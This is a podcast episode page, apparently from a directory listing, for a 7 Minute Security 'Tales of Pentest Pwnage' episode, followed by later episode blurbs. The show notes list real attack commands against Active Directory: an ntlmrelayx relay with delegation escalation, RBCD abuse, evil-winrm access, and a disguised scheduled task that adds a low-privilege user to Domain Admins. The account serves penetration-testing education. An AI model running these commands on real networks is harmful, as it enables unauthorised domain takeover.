7MS #691: Tales of Pentest Pwnage – Part 75
7 Minute Security5 Sep 2025

7MS #691: Tales of Pentest Pwnage – Part 75

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode:

  • Got an SA account to a SQL server through Snaffler-ing
  • With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
  • I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
  • I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
  • Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
  • From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
  • Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
  • …and ran it: schtasks /run /tn "TotallyFineTask"

Avsnitt(720)

7MS #720: Tales of Pentest Pwnage – Part 84

7MS #720: Tales of Pentest Pwnage – Part 84

Hey friends! Today's another Tales of Pentest Pwnage! Quick tangent first on a couple side projects: I've got a music thing at quack.house (like the duck noise, not the drug) and a podcast with my dan...

1 Maj 43min

7MS #719: Baby's First OpenClaw

7MS #719: Baby's First OpenClaw

Hey friends! This week's episode is "Baby's First OpenClaw" – basically me shouting into the void hoping a smart listener will DM me and explain why this thing is supposed to be life-changing. Because...

24 Apr 28min

7MS #718: Fun Professional and Personal AI Project Ideas

7MS #718: Fun Professional and Personal AI Project Ideas

Hey friends! After last week's heavy episode about my wife's health scare in Punta Cana, today's is a lighter one. (Quick update: she's doing better – still recovering, but appetite's back and she's g...

17 Apr 28min

7MS #717: I Gave Up My Wife's PHI (And I'd Do It Again)

7MS #717: I Gave Up My Wife's PHI (And I'd Do It Again)

Hello friends! Today's episode is a bit of a detour from our usual content — it's part vacation horror story, part security/privacy confession. My wife got seriously ill during our spring break trip t...

10 Apr 48min

7MS #716: Tales of Pentest Pwnage – Part 83

7MS #716: Tales of Pentest Pwnage – Part 83

Today is my favorite pentest pwnage tale of 2026 – and maybe ever!  It centers around an ADCS abuse via an attack path I'd never seen before.  Tips include: Use Netexec to pull Powershell history Try...

3 Apr 33min

7MS #715: Tales of Pentest Pwnage – Part 82

7MS #715: Tales of Pentest Pwnage – Part 82

Hola friends!  Today's another fun tale of pentest pwnage.  This time we started with no credentials and then set off on the bumpy journey from no-cred zero to domain admin hero!  One specific referen...

27 Mars 20min

7MS #714: Tales of Pentest Pwnage – Part 81

7MS #714: Tales of Pentest Pwnage – Part 81

Hello friends!  We're back with a fun tale of internal network pentest pwnage.  This one highlights how AI can be used (with some guardrails!) to automate the boring stuff – and even help you pick par...

20 Mars 22min

7MS #713: How to Secure Your Community – Part 3

7MS #713: How to Secure Your Community – Part 3

Hello friends, in today's edition of How to Secure Your Community, I give a brief recap of part 1 and part 2, and then dive into some cool phone shortcuts you can setup so that with a single tap, you ...

13 Mars 31min

Populärt inom Politik & nyheter

aftonbladet-krim
p3-krim
politiken
aftonbladet-daily
rss-krimstad
svenska-fall
spar
flashback-forever
rss-expressen-dok
rss-krimreportrarna
kungligt
rss-sanning-konsekvens
rss-vad-fan-hande
ett-rent-noje
rss-frandfors-horna
motiv
rss-flodet
blenda-2
krimmagasinet
svd-ledarredaktionen